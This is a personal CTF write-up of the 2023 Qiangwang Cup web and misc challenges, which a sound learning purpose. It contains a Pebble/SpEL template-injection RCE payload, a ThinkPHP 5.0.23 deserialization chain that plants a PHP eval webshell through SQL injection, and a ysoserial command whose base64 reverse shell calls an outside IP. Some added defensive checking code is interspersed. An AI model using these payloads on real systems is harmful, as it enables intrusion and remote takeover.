2023 7th Qiangwang Cup (强网杯): Personal Write-up

Published: 2023-12-21 20:18:45  Author: cyyyyi

27 htppy Spring

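Verdict: relatively easy, but it was released late, so relatively few people solved it.

The overall flow: a .pebble template file can be uploaded, and requesting the uploaded malicious template then gives RCE.

First, upload the malicious template file. A few attempts showed that the blacklist filters org.springframework.context.support.ClassPathXmlApplicationContext and {{.

The final .pebble file content is: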

content=666{%25+set+clazz%3dbeans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").getResourceLoader().getClassLoader().loadClass("org.springframework.expression.spel.standard.SpelExpressionParser")+%25}{%25+set+instance+%3d++beans.get("jacksonObjectMapper").readValue("{}",+clazz)+%25}{%25+set+a+%3d+instance.parseExpression("new+java.lang.ProcessBuilder(\"bash\",+\"-c\",+\"cat+/flag>/tmp/777.pebble\").start()").getValue()%25}888

Reference: https://www.cnblogs.com/kingbridge/articles/16592408.html

Note the time in the response; it is needed in the next step when requesting the template file.

A response of 666888 means the template code in the middle executed successfully; then request 777 to get the flag.

Flag

flag{862ce055-ec20-4907-b7d0-7fa24197ded1}

29 thinkshop

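Verdict: mostly fine, but if they did not want to hand out the attachment, they might as well not have provided one.

The overall flow: log in to the admin backend, then use SQL injection to reach deserialization (ThinkPHP 5.0.23 has a deserialization vulnerability; the 5.0.23 RCE bug has already been patched in this challenge).

The useful items in the attachment are shop.sql, sql.sql, goods.sql, and the project source code.

The source shows that there is an admin backend. At login, username is cast to int, and the SQL operation that is executed is:

[screenshot: SQL executed at login]

The data in the database is:

[screenshot: database contents]

So username=1&password=123456 can be used to log in to the backend.

In the goods-editing logic, the entire POST array is passed in.

It is eventually passed to the updaedata method. Since data is attacker-controlled, its keys are controllable as well, and they are concatenated into the SQL statement without any processing, so SQL injection is possible here.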
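The key concatenation described above, reduced to a self-contained sketch. This is an added example, not the challenge's source: the goods table and its column names come from the request shown later in this write-up, both builder functions are hypothetical, and Python with SQLite stands in for the PHP/MySQL application.

```python
import sqlite3

# Columns the edit form may change (names taken from the write-up's request).
ALLOWED = {"name", "price", "on_sale_time", "image", "data"}

def build_update_unsafe(post):
    """Mirrors the flaw: every POST key is pasted into the SET clause."""
    fields = {k: v for k, v in post.items() if k != "id"}
    sets = ", ".join(f"`{k}` = ?" for k in fields)
    return f"UPDATE goods SET {sets} WHERE `id` = ?", [*fields.values(), post["id"]]

def build_update_safe(post):
    """Values stay bound parameters; keys must match a fixed column allowlist."""
    fields = {k: v for k, v in post.items() if k != "id"}
    unknown = set(fields) - ALLOWED
    if unknown:
        raise ValueError(f"unexpected field(s): {sorted(unknown)}")
    sets = ", ".join(f"`{k}` = ?" for k in fields)
    return f"UPDATE goods SET {sets} WHERE `id` = ?", [*fields.values(), int(post["id"])]

def demo():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE goods (id INTEGER PRIMARY KEY, name TEXT, price REAL,"
               " on_sale_time TEXT, image TEXT, data TEXT)")
    db.execute("INSERT INTO goods (id, name, data) VALUES (1, 'old', 'trusted')")
    # Constructed inputs: a normal edit, and one whose *key* carries SQL syntax.
    good = {"id": "1", "name": "aaaa", "price": "111111.00"}
    bad = {"id": "1", "name": "aaaa", "image`='x',`data`='changed' WHERE 1=1 -- ": ""}
    unsafe_sql, _ = build_update_unsafe(bad)   # built for inspection only, never executed
    sql, params = build_update_safe(good)
    db.execute(sql, params)
    try:
        build_update_safe(bad)
        rejected = False
    except ValueError:
        rejected = True
    row = db.execute("SELECT name, data FROM goods WHERE id = 1").fetchone()
    return unsafe_sql, rejected, row
```

Binding the values alone does not help here, because the injected text arrives in the key; only the allowlist keeps it out of the statement.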

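goods.html provides the deserialization entry point.

Normally it would be enough to base64-encode the serialized value and insert it through the SQL injection. There are two constraints, however:

  • First, the base64-encoded data must start with YTo, i.e. a:

  • Second, the deserialization chain would normally fire only after the program has finished executing, but here the deserialized object is passed to arrayTohtml, where a type mismatch in the later operations raises an error immediately, so the chain cannot be triggered.

To sum up, PHP's garbage collection can be used: put the object to be serialized in the first position of an array (key 0), add any arbitrary value after it (key 1), and after serializing, change the second key from 1 to 0. The chain is then triggered directly.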
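The YTo prefix check only proves that the outer value is an array. As an added example (not the challenge's code), here is a structural check a defender could run on the stored goods data before it reaches unserialize(): it walks the PHP serialization format and reports embedded objects and repeated array keys. The function names and both samples are constructed.

```python
import base64

def walk(buf, pos, findings):
    """Parse one serialized PHP value at buf[pos]; return (next position, scalar token)."""
    tag = buf[pos:pos + 1]
    if tag == b"N":
        return pos + 2, b"N"
    if tag in (b"i", b"b", b"d"):
        end = buf.index(b";", pos)
        return end + 1, buf[pos:end]
    if tag == b"s":
        colon = buf.index(b":", pos + 2)
        start = colon + 2                      # skip :"
        end = start + int(buf[pos + 2:colon])  # declared length is in bytes
        if buf[end:end + 2] != b'";':
            raise ValueError("bad string length")
        return end + 2, buf[pos:end]
    if tag not in (b"a", b"O"):
        raise ValueError("unsupported type tag")
    count_at = pos + 2
    if tag == b"O":                            # O:<len>:"<class>":<count>:{...}
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        findings.append("object " + buf[colon + 2:colon + 2 + n].decode("latin-1"))
        count_at = colon + n + 4
    brace = buf.index(b":{", count_at)
    pos, seen = brace + 2, set()
    for _ in range(int(buf[count_at:brace])):
        pos, key = walk(buf, pos, findings)
        if key in seen:
            findings.append("duplicate key " + key.decode("latin-1"))
        seen.add(key)
        pos, _value = walk(buf, pos, findings)
    if buf[pos:pos + 1] != b"}":
        raise ValueError("unterminated container")
    return pos + 1, b""

def inspect_serialized(b64_data):
    """Return reasons to refuse the value; an empty list means scalars and arrays only."""
    findings = []
    try:
        buf = base64.b64decode(b64_data, validate=True)
        end, _ = walk(buf, 0, findings)
        if end != len(buf):
            findings.append("trailing bytes")
    except ValueError:
        findings.append("malformed")
    return findings

# Constructed samples: ordinary attribute data, and an array whose first element
# is an object and whose second element reuses key 0.
PLAIN = base64.b64encode(b'a:2:{s:5:"color";s:3:"red";s:4:"size";i:42;}')
SUSPECT = base64.b64encode(b'a:2:{i:0;O:8:"stdClass":0:{}i:0;s:1:"6";}')
```

Both samples begin with YTo, so the prefix check passes them alike. On PHP 7 and later, unserialize($data, ['allowed_classes' => false]) enforces the no-objects part natively.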

The exp is as follows:

<?php

namespace think\cache\driver {

    class File
    {
        protected $options = [
            'expire'        => 0,
            'cache_subdir'  => false,
            'prefix'        => '',
            'path'          => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4=',
            'data_compress' => false,
        ];
        protected $tag = "flag";
        public function __construct()
        {
            echo  "后门文件名称为" . "aaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4=" . md5("tag_" . md5($this->tag)) . ".php" . "\n\n\n";
        }
    }
}


namespace think\session\driver {

    use SessionHandler;
    use think\cache\driver\File;

    class Memcache extends SessionHandler
    {
        protected $handler = null;
        public function __construct()
        {
            $this->handler = new  File();
        }
    }
}

namespace think\console {


    use think\session\driver\Memcache;

    class Output
    {
        private $verbosity = 1;
        private $handle;
        const OUTPUT_NORMAL = 1;
        protected $styles = [
            'getAttr'
        ];
        public function __construct()
        {
            $this->verbosity = 1;
            $this->handle = new Memcache();
        }
    }
}

namespace think\db {

    use think\console\Output;

    class Query
    {
        protected $model;
        public function __construct()
        {
            $this->model = new output();
        }
    }
}

namespace think\model\relation {

    use think\db\Query;

    class HasOne
    {
        protected $selfRelation;
        protected $query;
        protected $bindAttr = [];
        public function __construct()
        {
            $this->selfRelation = 0;
            $this->query = new Query();
            $attr = 'flag';
            $this->bindAttr['flag'] = $attr;
        }
    }
}

namespace think {
    abstract class Model
    {
    }
}

namespace think\model {


    use think\model\relation\HasOne;
    use think\console\Output;
    use think\Model;

    class Pivot extends Model
    {

        protected $data = [];
        protected $append = [];
        protected $error;
        public $parent;
        public function __construct()
        {
            $this->error =  new HasOne();
            $this->parent = new output();
            $name = 'getError';

            $this->append[] = $name;
        }
    }
}

namespace think\process\pipes {

    use think\model\Pivot;

    class  Windows
    {
        private $files = [];
        public function __construct()
        {
            $this->files[0] =  new Pivot();
        }
        // var_dump

    }
    $a = array(0 => new  Windows(), 1 => "6");

    $c = urldecode("a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bi%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A3%3A%7Bs%3A31%3A%22%00think%5Cconsole%5COutput%00verbosity%22%3Bi%3A1%3Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A29%3A%22think%5Csession%5Cdriver%5CMemcache%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A117%3A%22php%3A%2F%2Ffilter%2Fconvert.iconv.utf-8.utf-7%7Cconvert.base64-decode%2Fresource%3DaaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4%3D%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bs%3A4%3A%22flag%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22flag%22%3Bs%3A4%3A%22flag%22%3B%7D%7Ds%3A6%3A%22parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A3%3A%7Bs%3A31%3A%22%00think%5Cconsole%5COutput%00verbosity%22%3Bi%3A1%3Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A29%3A%22think%5Csession%5Cdriver%5CMemcache%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3B
s%3A4%3A%22path%22%3Bs%3A117%3A%22php%3A%2F%2Ffilter%2Fconvert.iconv.utf-8.utf-7%7Cconvert.base64-decode%2Fresource%3DaaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4%3D%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bs%3A4%3A%22flag%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7Di%3A1%3Bs%3A0%3A%226%22%3B%7D");
    echo bin2hex(base64_encode($c));
}

The final request is as follows:

POST /public/index.php/index/admin/do_edit.html HTTP/1.1
Host: eci-2zef9lbnpjl0n8we7yhu.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 426
Origin: http://eci-2zef9lbnpjl0n8we7yhu.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zef9lbnpjl0n8we7yhu.cloudeci1.ichunqiu.com/public/index.php/index/admin/goods_edit/id/1.html
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1701612145,1701926910,1702102270,1702619199; PHPSESSID=qq8ks874l951ucqk29tnrj14h5
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

id=1&name=aaaa&price=111111.00&on_sale_time=2023-01-01T15%3A16&image`%3dunhex('61'),`data`%3dunhex('<hex string printed by the exp above>')/**/WHERE/**/`id`%3d1#=&data=

After the update, visit the front-end page once, then request /public/aaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4=09621a5f4361062ae732f5ed9c5764c0.php.

Flag

flag{c7262541-e441-43a4-a35a-8d21966039ac}

36 happygame

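Why does a web challenge need nc?

A Baidu search on the error message shows that this is gRPC.

The challenge provides a gRPC server, so we need a client that speaks that protocol to connect to it.

Connect with grpcui.

It exposes serializeData, which indicates that deserialization is the intended attack. After some attempts, Java's CC6 chain worked.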

java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvNDMuMTQyLjE1LjEwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}" > 1.class

The final payload is the base64-encoded serialized object.

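Because serializeData takes a raw Java object stream, the receiving side can triage the bytes before anything is deserialized. Added example (not from the challenge): it checks the stream header behind the rO0AB prefix and heuristically lists the class names declared in the stream so they can be compared with an allowlist. The function names, the allowlist and the sample stream are constructed, and the sample is not a deserializable object.

```python
import base64
import re
import struct

MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC + STREAM_VERSION, "rO0AB..." in base64
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72
NAME = re.compile(rb"\[*[A-Za-z_$][\w$.]*;?\Z")
ALLOWED_PREFIXES = ("java.lang.", "java.util.")   # hypothetical allowlist

def declared_classes(b64_stream):
    """Heuristic scan for TC_CLASSDESC records: 0x72, 2-byte length, class name."""
    data = base64.b64decode(b64_stream, validate=True)
    if not data.startswith(MAGIC):
        raise ValueError("not a Java serialization stream")
    names, i = [], len(MAGIC)
    while i < len(data) - 3:
        if data[i] == TC_CLASSDESC:
            (n,) = struct.unpack_from(">H", data, i + 1)
            name = data[i + 3:i + 3 + n]
            # A descriptor continues with an 8-byte serialVersionUID and a flags byte.
            if n and len(name) == n and NAME.match(name) and i + 3 + n + 9 <= len(data):
                names.append(name.decode("ascii"))
                i += 3 + n + 9
                continue
        i += 1
    return names

def rejected_classes(b64_stream):
    """Class names outside the allowlist (array prefixes such as '[L' are ignored)."""
    return [c for c in declared_classes(b64_stream)
            if not re.sub(r"^\[+L", "", c).startswith(ALLOWED_PREFIXES)]

def _desc(name):
    # Constructed descriptor: name, serialVersionUID=1, flags, 0 fields, end, no superclass.
    raw = name.encode()
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw
            + struct.pack(">qBH", 1, 2, 0) + b"\x78\x70")

# Constructed sample: two class descriptors behind a valid stream header.
SAMPLE = base64.b64encode(MAGIC + bytes([TC_OBJECT]) + _desc("java.util.HashSet")
                          + bytes([TC_OBJECT])
                          + _desc("org.apache.commons.collections.map.LazyMap"))
```

Inside the Java service itself, the corresponding enforcement point is an ObjectInputFilter allowlist set on the ObjectInputStream.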

Flag

flag{088ca719-e003-441b-9a0e-c916134c4add}

38 谍影重重2.0

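Monitoring an aircraft's flight status actually means monitoring ADS-B messages; for details see https://zhuanlan.zhihu.com/p/646365846?utm_id=0

First export the capture from Wireshark in JSON format, then process it with Python.

Computing the speed with pyModeS raised an error that I did not know how to resolve, but I found that pyModeS.decoder.adsb.icao can be used directly to get the ICAO code. There turned out to be only 7 of them, so I simply tried them one by one and finally got the correct flag.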

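from pyModeS import decoder
import json, hashlib

# Packets exported from Wireshark as JSON
packets = json.load(open('adsb.json', encoding="utf-8"))

# Keep packets with a TCP payload; drop the ':' separators and the first
# 18 hex characters, leaving the ADS-B message
messages = [
    p['_source']['layers']['tcp']['tcp.payload'].replace(":", "")[18:]
    for p in packets
    if "tcp.payload" in p['_source']['layers']['tcp']
]

# One candidate flag per unique ICAO code
icaos = set(decoder.adsb.icao(m) for m in messages)
print(["flag{" + hashlib.md5(icao.encode()).hexdigest() + "}" for icao in icaos])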

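The script simply extracts the value of the tcp.payload field, keeps the useful part of the message, passes it to decoder.adsb.icao to get the ICAO code, and computes the flag value.

Flag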

flag{4cf6729b9bc05686a79c1620b0b1967b}

41 Pyjail ! It's myFILTER !!!

This was solved with an unintended solution: just use open to read the environment variables.

{print(open("/proc/self/environ").read())}

Flag

flag{c64da498-7a39-49cb-b8ed-fd840134f78d}